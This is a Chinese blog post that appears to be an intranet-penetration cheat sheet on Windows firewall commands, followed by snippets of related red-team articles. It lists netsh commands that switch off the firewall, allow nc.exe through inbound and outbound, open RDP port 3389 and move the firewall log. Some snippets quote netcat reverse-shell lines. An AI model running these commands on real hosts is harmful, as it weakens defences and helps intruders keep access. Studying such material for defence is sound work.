内网渗透-防火墙信息

最新推荐文章于 2024-09-02 18:44:13 发布
最新推荐文章于 2024-09-02 18:44:13 发布
阅读量717 收藏 4
点赞数 1
分类专栏: 信息搜集笔记 内网渗透 文章标签: 内网渗透 信息搜集 安全
本文链接:https://blog.youkuaiyun.com/weixin_43221560/article/details/110743325
版权

作者:小刚
一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢
本实验仅用于信息防御教学,切勿用于其它用途

防火墙信息

防火墙信息

主要用来查看端口,开放端口通行

查看配置

netsh Firewall show state	#查看防火墙状态

netsh Firewall show config	#查看防火墙配置

netsh advfirewall Firewall    #查看防火墙配置

操作防火墙

配置防火墙需要管理员权限

netsh firewall set opmode disable	#关闭防火墙 Server 2003之前的版本

netsh advfirewall set allprofiles state off		#关闭防火墙,Server 2003之后的版本

netsh Firewall add allowedprogram d:\nc.exe "allow nc" enable	#Server 2003及之前的版本允许指定程序的全部连接

设置出入站

#Server 2003之后的版本

netsh advfirewall firewall add rule name="pass nc" dir=in action=allow program="d:\nc.exe"	#允许入站

netsh advfirewall firewall add rule name="Allow nc" dir=out action=allow program="d:\nc.exe"	#允许出站

netsh advfirewall firewall add rule name="remote Desktop" protocol=TCP dir=in localport=3389 action=allow	#3389端口放行

netsh advfirewall set currentprofile logging filename "C:\windows\temp\firewall.log"	#自定义防火墙日志存储位置

整理的文档和工具
在这里插入图片描述
可关注微信公众号:XG小刚
回复:内网信息搜集
在这里插入图片描述

内网渗透-内网信息收集
lza20001103的博客
09-21 9762
内网信息收集 文章目录内网信息收集前言msf模块中的信息收集msf反弹shell后的信息收集内网信息收集后记 前言 当我们进行外网信息收集,漏洞探测以及漏洞利用后,获得了主机的权限后,我们需要扩大渗透的战果时,这是我们就要进行内网渗透了,内网渗透最重要的还是前期的信息收集的操作了,就是我们的内网信息收集了,信息收集需要收集什么内容,对后期的横向和纵向移动都有很大的帮助。接下来给大家总结一下内网渗透中的信息收集的模块内容。 msf模块中的信息收集 Msf模块 run post/ run post/windo
红队内网攻防渗透内网渗透内网对抗:网络通讯篇&防火墙组策略&入站和出站规则&单层双层&C2正反向上线&解决方案
HACKONE的博客
06-21 334
1、防火墙默认入站&出站策略2、防火墙自定义入站&出站策略操作:组策略管理--创建GPO链接-防火墙设置更新策略:强制 & 命令 & 重启命令:gpupdate / force。
内网渗透-防火墙+入站出站规则+组策略对象同步+不出网隧道上线
xiaoheizi的博客
11-02 1518
5.限制协议:在来到出站规则——右键 新建规则 ——端口——选择 TCP和所有端口——阻止连接——选择 域——名字:TCP协议控制。2.因为使用的是reverse监听器方式,所以是出站,使用的是9527端口。如果目标主机的出站规则中TCP协议被封杀,入站规则没有封杀,有互联网网络。3.fhq处右键——编辑——来到 高级安全 windows 防火墙——右键 属性。1.查看一台域内主机的防火墙状态,域和专用网络是开启状态,公用网络关闭状态。4.我们配置为:域——启用 专用和公用——关闭。
(转载)再谈防火墙防火墙渗透
Kendiv's Box
02-23 3609
再谈防火墙防火墙渗透创建时间:2005-02-20文章属性:原创文章提交:mrcool (mrcoolfuyu_at_tom.com)(一)  防火墙介绍    防火墙是一种功能,它使得内部网络和外部网络或Internet互相隔离,以此来保护内部网络或主机。简单的防火墙可以由Router,3 Layer Switch的ACL(access control list)来充当,也可以用一台主机,甚
[内网渗透]CS上线后,关于防火墙的操作
qq_60115503的博客
09-08 538
【代码】[内网渗透]CS上线后,关于防火墙的操作。
渗透测试之防火墙
jklove9的博客
10-09 2502
防火墙相关 防火墙的基本概念(安全防护功能网络设备) 隔离设备,负责隔离网络,将需要保护的网络与不可信任网络进行隔离,隐藏信息并进行安全防护 防火墙也可以配路由,属于三层以上设备,能够代替路由,和路由的根本区别是防火墙要做限制,防火墙的本质功能就是隔离,防火墙是默认所有都不能过,写完策略之后,少部分能通过,路由是默认所有人都能过,写完策略之后,一少部分人不能过。 泛洪攻击,运营商清洗流量 Dos拒绝服务攻击与DDOS分布式拒绝攻击 防火墙的基本功能(防火墙完全可以替代路由器) 访问控制(ACL
内网渗透-防火墙出入规则上线-正反向连接+隧道技术-SMB+防火墙控制
xiaoheizi的博客
11-10 481
想要通过windows10正向连接拿下windows2008时,发现windows2008开启了防火墙对入站规则做了限制,无法正向连接。拿下win2008后,我们还想要让win2012也上线cs,但是因为win2008限制了入站规则,所以无法再使用反向连接上线。前提:已经使用攻击机通过漏洞拿下了windows7主机,又通过windows7正向连接拿下了windows10。开启防火墙netsh advfirewall set allprofiles state on。2.生成后门,使用此监听器。
网络安全---NS-CH12-防火墙.pptx
06-09
防火墙(firewall)是位于两个(或多个)网络间实施网间访问控制的组件的集合 满足以下条件: 内网和外网的所有网络数据流必须经过防火墙 只有符合安全策略的数据流才能通过防火墙 防火墙自身对渗透(penetration)是免疫...
内网渗透-不出网cs的各种姿势(内网穿透)
m0_68976043的博客
05-20 1607
官网介绍:SMB Beacon使用命名管道通过父级Beacon进行通讯,当两个Beacons连接后,子Beacon从父Beacon获取到任务并发送。因为连接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽,绕防火墙时可能发挥奇效。
渗透测试-防火墙识别
分享学习网络的点点滴滴
05-12 712
通过防火墙识别,可判断防火墙类型并尝试绕过
渗透防护墙的渗透技术
兼容并蓄终宽阔,若谷虚怀鱼自游
08-20 782
   说到通道技术,我想再提一下“端口复用”,很多朋友以为通道技术就是端口复用技术。那么,错了,端口复用是指一个端口上建立了多个连接,而不是在一个端口上面开放了多个服务而互不干扰。假如你想在已经开放了WWW服务的主机上,在80端口再添加一项服务,只有2种可能:1.添加服务失败2.WWW服务出错。那么什么是通道呢?这里所谓的通道,是指一种绕过防火墙端口屏蔽的通讯方式。防火墙两端的数据包封
内网渗透—域信息收集&防火墙策略同步&不出网ICMP隧道上线
2301_76227305的博客
05-14 859
域是一个有安全边界的计算机集合,在域内的计算机互相信任,在域内访问其他机器,不需要再被访问机器许可滴。域内的主机由域控制器(Domain Controller,DC)统一管理,每个域至少有一台DC。域中的账号和资源统一被DC管理,比如管理员登录了DC,那么他就可以对域内的账号进行密码修改或者限制它访问某类资源,安装软件啥的。拥有域账号的用户叫域用户,域用户可以在域内的任何一机器登录它的域账号,比如A机器和B机器在同一域内,那么域用户既可以在机器A登录也可以在机器B登录。以上就是本次的内容啦。
内网渗透-内网渗透基础
最新发布
qq_64177395的博客
09-02 1197
在一个大型单位里,可能有成百上千台计算机互相连接组成局域网,它们都会列在"网络"(网上邻居)内。如果不对这些 计算机进行分组,网络的混乱程度是可想而知的 为了解决这一问题,产生了工作组( Work Group)这个概念。将不同 的计算机按功能(或部 门)分别列入不同的工作组,例如技术部的计算机都列入"技术部"工作组、行政部的计算机都 列 入"行政部"工作组。要想访问某个部门的资源,只要在"网络"里双击该部门的工作组名 就可以看到该部门的所有计算 机了。
服务运维篇-通过防火墙抵御渗透扫描
猫步轻移,以学求知。余于此方寸之地,如猫观鼠,细察技艺所得,思维所悟。灵思如猫之警觉,日积月累,终成智海;
04-23 525
这段时间为应对渗透攻击(GFYL),各服务都要做好端口控制,为此分享和记录工作中的一个方法,希望对各位有这问题的人有所帮助。
内网渗透的边界场景分析+内网代理整理
aikandu9426的博客
03-22 744
先从nc开始理解正向代理和反向代理: 1、正向连接 受害者主机执行 nc -e -t /bin/bash -lvp 7777 攻击者执行 nc -t 192.168.16.X 7777 2、反向连接 受害者主机执行 nc -t -e cmd.exe 192.168.16.104 7777 攻击者主机执行 nc -lvp...
渗透——内网转发之利用防火墙规则转发端口实现远程桌面连接
爱国小白帽
03-18 2098
实验环境: Windows Server 2008 R2 x64 Windows Server 2003 IIS服务器 环境搭建: 模拟实验:
渗透之关闭防火墙、杀毒软件并开启远程桌面
总有人间一两风,填我十万八千梦
04-13 8973
目录 一. 关闭防火墙 二.关闭windows Defender和DEP数据执行保护 三. 关闭杀毒软件 四. 开启远程桌面 当我们拿下一台主机后,想在主机上留后门,那么我们的首要任务就是关闭主机的防火墙。因为防火墙会把我们的后门程序进行拦截。我们用msf获取到了权限 一. 关闭防火墙 以下是在win7和win2008r2的机器上实验的,在administrator和system的权限下都能成功将防火墙关闭和开启。普通用户不行 1. 在system权限下执行 此时防火墙的状态是开启的.
netsh advfirewall firewall show rule 隐藏参数,查看入站、已启用的策略
Liv2005的专栏
08-24 7247
netsh advfirewall firewall show rule 的隐藏参数
内网渗透--ICMP隧道
05-16
对于内网渗透而言,ICMP隧道可以用于将攻击者的数据从受害主机中转出,绕过防火墙和其他网络安全设备的检测和过滤。 ICMP隧道的实现需要两个端点:一个客户端和一个服务器端。客户端将要传输的数据封装在ICMP数据包...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值